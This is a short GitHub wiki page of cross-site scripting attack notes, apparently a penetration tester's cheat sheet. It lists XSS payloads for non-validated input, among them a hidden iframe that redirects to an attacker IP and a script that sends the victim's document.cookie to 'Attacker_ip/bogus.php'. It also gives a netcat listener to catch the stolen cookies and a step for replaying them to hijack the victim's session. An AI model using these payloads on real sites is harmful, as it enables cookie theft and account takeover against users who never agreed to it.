-
Notifications
You must be signed in to change notification settings - Fork 14
Web_XSS
lethanhtung01011980 edited this page Dec 11, 2019
·
5 revisions
- To attack on non-validated user input.
To enter scripts into user inputs
- Local XSS:
<script>Hi</script>
- Browser redirection:
<iframe SRC="http://Attacker_IP/report" height = "0" width ="0"></iframe>
To listen to remote connection from browser redirection
- In attacker machine,
nc -nlvp 80
No need to have a bogus.php page
nc -nlvp 80
<script>new Image().src="http://Attacker_ip/bogus.php?output="+document.cookie;</script>
- Use Cookies Manager+ to open victim website with stolen cookie.